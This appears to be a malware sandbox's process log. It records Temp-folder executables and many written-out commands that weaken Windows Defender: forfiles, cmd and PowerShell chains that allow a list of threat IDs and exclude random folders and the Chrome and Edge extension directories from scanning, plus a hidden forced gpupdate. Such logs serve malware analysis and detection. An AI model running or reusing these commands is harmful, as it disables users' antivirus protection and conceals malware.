C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1128
C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1124
C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe wc /ydidAPN 385133 /S
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1996 -ip 1996
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 556
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1996 -ip 1996
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 596
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1996 -ip 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 620
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1996 -ip 1996
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 808
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1996 -ip 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 876
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1996 -ip 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 912
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1996 -ip 1996
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 892
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1996 -ip 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 964
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1996 -ip 1996
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 972
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1996 -ip 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1100
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1996 -ip 1996
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1100
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1996 -ip 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1128
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IfTYFdYohdhRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IfTYFdYohdhRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cBfgrRECHDYJtCCxauR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cBfgrRECHDYJtCCxauR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mgvwDscPBpUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mgvwDscPBpUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sozrmRSxWUyU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sozrmRSxWUyU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xFHhRZnoU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xFHhRZnoU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\asFrGLUBkJEUSBVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\asFrGLUBkJEUSBVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gXItsKzEGiJHAsry\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gXItsKzEGiJHAsry\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IfTYFdYohdhRC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IfTYFdYohdhRC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IfTYFdYohdhRC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cBfgrRECHDYJtCCxauR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cBfgrRECHDYJtCCxauR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgvwDscPBpUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgvwDscPBpUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sozrmRSxWUyU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sozrmRSxWUyU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xFHhRZnoU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xFHhRZnoU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\asFrGLUBkJEUSBVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\asFrGLUBkJEUSBVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gXItsKzEGiJHAsry /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gXItsKzEGiJHAsry /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
